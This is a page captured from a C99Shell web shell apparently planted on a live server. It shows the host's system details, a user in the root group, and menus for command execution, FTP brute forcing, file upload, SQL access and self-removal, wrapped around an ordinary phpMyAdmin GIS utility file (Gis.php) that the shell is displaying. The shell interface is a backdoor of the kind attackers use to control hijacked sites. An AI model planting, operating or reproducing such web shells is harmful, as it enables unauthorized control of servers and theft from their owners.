!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/public_html/phpmyadmin/libraries/classes/Utils/   drwxr-xr-x
Free 28.76 GB of 117.98 GB (24.38%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Gis.php (9.48 KB)      -rwxr-x---
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

declare(strict_types=1);

namespace 
PhpMyAdmin\Utils;

use function 
array_map;
use function 
bin2hex;
use function 
mb_strtolower;
use function 
preg_match;
use function 
trim;

final class 
Gis
{
    
/**
     * Converts GIS data to Well Known Text format
     *
     * @param string $data        GIS data
     * @param bool   $includeSRID Add SRID to the WKT
     *
     * @return string GIS data in Well Know Text format
     */
    
public static function convertToWellKnownText($data$includeSRID false): string
    
{
        global 
$dbi;

        
// Convert to WKT format
        
$hex bin2hex($data);
        
$spatialAsText 'ASTEXT';
        
$spatialSrid 'SRID';
        
$axisOrder '';
        
$mysqlVersionInt $dbi->getVersion();
        if (
$mysqlVersionInt >= 50600) {
            
$spatialAsText 'ST_ASTEXT';
            
$spatialSrid 'ST_SRID';
        }

        if (
$mysqlVersionInt >= 80001 && ! $dbi->isMariaDb()) {
            
$axisOrder ', \'axis-order=long-lat\'';
        }

        
$wktsql 'SELECT ' $spatialAsText "(x'" $hex "'" $axisOrder ')';
        if (
$includeSRID) {
            
$wktsql .= ', ' $spatialSrid "(x'" $hex "')";
        }

        
$wktresult $dbi->tryQuery($wktsql);
        
$wktarr = [];
        if (
$wktresult) {
            
$wktarr $wktresult->fetchRow();
        }

        
$wktval $wktarr[0] ?? '';

        if (
$includeSRID) {
            
$srid $wktarr[1] ?? null;
            
$wktval "'" $wktval "'," $srid;
        }

        return 
$wktval;
    }

    
/**
     * Return GIS data types
     *
     * @param bool $upperCase whether to return values in upper case
     *
     * @return string[] GIS data types
     */
    
public static function getDataTypes($upperCase false): array
    {
        
$gisDataTypes = [
            
'geometry',
            
'point',
            
'linestring',
            
'polygon',
            
'multipoint',
            
'multilinestring',
            
'multipolygon',
            
'geometrycollection',
        ];
        if (
$upperCase) {
            
$gisDataTypes array_map('mb_strtoupper'$gisDataTypes);
        }

        return 
$gisDataTypes;
    }

    
/**
     * Generates GIS data based on the string passed.
     *
     * @param string $gisString    GIS string
     * @param int    $mysqlVersion The mysql version as int
     *
     * @return string GIS data enclosed in 'ST_GeomFromText' or 'GeomFromText' function
     */
    
public static function createData($gisString$mysqlVersion)
    {
        
$geomFromText $mysqlVersion >= 50600 'ST_GeomFromText' 'GeomFromText';
        
$gisString trim($gisString);
        
$geomTypes '(POINT|MULTIPOINT|LINESTRING|MULTILINESTRING|POLYGON|MULTIPOLYGON|GEOMETRYCOLLECTION)';
        if (
preg_match("/^'" $geomTypes "\(.*\)',[0-9]*$/i"$gisString)) {
            return 
$geomFromText '(' $gisString ')';
        }

        if (
preg_match('/^' $geomTypes '\(.*\)$/i'$gisString)) {
            return 
$geomFromText "('" $gisString "')";
        }

        return 
$gisString;
    }

    
/**
     * Returns the names and details of the functions
     * that can be applied on geometry data types.
     *
     * @param string $geomType if provided the output is limited to the functions
     *                          that are applicable to the provided geometry type.
     * @param bool   $binary   if set to false functions that take two geometries
     *                         as arguments will not be included.
     * @param bool   $display  if set to true separators will be added to the
     *                         output array.
     *
     * @return array<int|string,array<string,int|string>> names and details of the functions that can be applied on
     *                                                    geometry data types.
     */
    
public static function getFunctions(
        
$geomType null,
        
$binary true,
        
$display false
    
): array {
        global 
$dbi;

        
$funcs = [];
        if (
$display) {
            
$funcs[] = ['display' => ' '];
        }

        
// Unary functions common to all geometry types
        
$funcs['Dimension'] = [
            
'params' => 1,
            
'type' => 'int',
        ];
        
$funcs['Envelope'] = [
            
'params' => 1,
            
'type' => 'Polygon',
        ];
        
$funcs['GeometryType'] = [
            
'params' => 1,
            
'type' => 'text',
        ];
        
$funcs['SRID'] = [
            
'params' => 1,
            
'type' => 'int',
        ];
        
$funcs['IsEmpty'] = [
            
'params' => 1,
            
'type' => 'int',
        ];
        
$funcs['IsSimple'] = [
            
'params' => 1,
            
'type' => 'int',
        ];

        
$geomType mb_strtolower(trim((string) $geomType));
        if (
$display && $geomType !== 'geometry' && $geomType !== 'multipoint') {
            
$funcs[] = ['display' => '--------'];
        }

        
$spatialPrefix '';
        if (
$dbi->getVersion() >= 50601) {
            
// If MySQL version is greater than or equal 5.6.1,
            // use the ST_ prefix.
            
$spatialPrefix 'ST_';
        }

        
// Unary functions that are specific to each geometry type
        
if ($geomType === 'point') {
            
$funcs[$spatialPrefix 'X'] = [
                
'params' => 1,
                
'type' => 'float',
            ];
            
$funcs[$spatialPrefix 'Y'] = [
                
'params' => 1,
                
'type' => 'float',
            ];
        } elseif (
$geomType === 'linestring') {
            
$funcs['EndPoint'] = [
                
'params' => 1,
                
'type' => 'point',
            ];
            
$funcs['GLength'] = [
                
'params' => 1,
                
'type' => 'float',
            ];
            
$funcs['NumPoints'] = [
                
'params' => 1,
                
'type' => 'int',
            ];
            
$funcs['StartPoint'] = [
                
'params' => 1,
                
'type' => 'point',
            ];
            
$funcs['IsRing'] = [
                
'params' => 1,
                
'type' => 'int',
            ];
        } elseif (
$geomType === 'multilinestring') {
            
$funcs['GLength'] = [
                
'params' => 1,
                
'type' => 'float',
            ];
            
$funcs['IsClosed'] = [
                
'params' => 1,
                
'type' => 'int',
            ];
        } elseif (
$geomType === 'polygon') {
            
$funcs['Area'] = [
                
'params' => 1,
                
'type' => 'float',
            ];
            
$funcs['ExteriorRing'] = [
                
'params' => 1,
                
'type' => 'linestring',
            ];
            
$funcs['NumInteriorRings'] = [
                
'params' => 1,
                
'type' => 'int',
            ];
        } elseif (
$geomType === 'multipolygon') {
            
$funcs['Area'] = [
                
'params' => 1,
                
'type' => 'float',
            ];
            
$funcs['Centroid'] = [
                
'params' => 1,
                
'type' => 'point',
            ];
            
// Not yet implemented in MySQL
            //$funcs['PointOnSurface'] = array('params' => 1, 'type' => 'point');
        
} elseif ($geomType === 'geometrycollection') {
            
$funcs['NumGeometries'] = [
                
'params' => 1,
                
'type' => 'int',
            ];
        }

        
// If we are asked for binary functions as well
        
if ($binary) {
            
// section separator
            
if ($display) {
                
$funcs[] = ['display' => '--------'];
            }

            
$funcs[$spatialPrefix 'Crosses'] = [
                
'params' => 2,
                
'type' => 'int',
            ];
            
$funcs[$spatialPrefix 'Contains'] = [
                
'params' => 2,
                
'type' => 'int',
            ];
            
$funcs[$spatialPrefix 'Disjoint'] = [
                
'params' => 2,
                
'type' => 'int',
            ];
            
$funcs[$spatialPrefix 'Equals'] = [
                
'params' => 2,
                
'type' => 'int',
            ];
            
$funcs[$spatialPrefix 'Intersects'] = [
                
'params' => 2,
                
'type' => 'int',
            ];
            
$funcs[$spatialPrefix 'Overlaps'] = [
                
'params' => 2,
                
'type' => 'int',
            ];
            
$funcs[$spatialPrefix 'Touches'] = [
                
'params' => 2,
                
'type' => 'int',
            ];
            
$funcs[$spatialPrefix 'Within'] = [
                
'params' => 2,
                
'type' => 'int',
            ];

            if (
$display) {
                
$funcs[] = ['display' => '--------'];
            }

            
// Minimum bounding rectangle functions
            
$funcs['MBRContains'] = [
                
'params' => 2,
                
'type' => 'int',
            ];
            
$funcs['MBRDisjoint'] = [
                
'params' => 2,
                
'type' => 'int',
            ];
            
$funcs['MBREquals'] = [
                
'params' => 2,
                
'type' => 'int',
            ];
            
$funcs['MBRIntersects'] = [
                
'params' => 2,
                
'type' => 'int',
            ];
            
$funcs['MBROverlaps'] = [
                
'params' => 2,
                
'type' => 'int',
            ];
            
$funcs['MBRTouches'] = [
                
'params' => 2,
                
'type' => 'int',
            ];
            
$funcs['MBRWithin'] = [
                
'params' => 2,
                
'type' => 'int',
            ];
        }

        return 
$funcs;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0079 ]--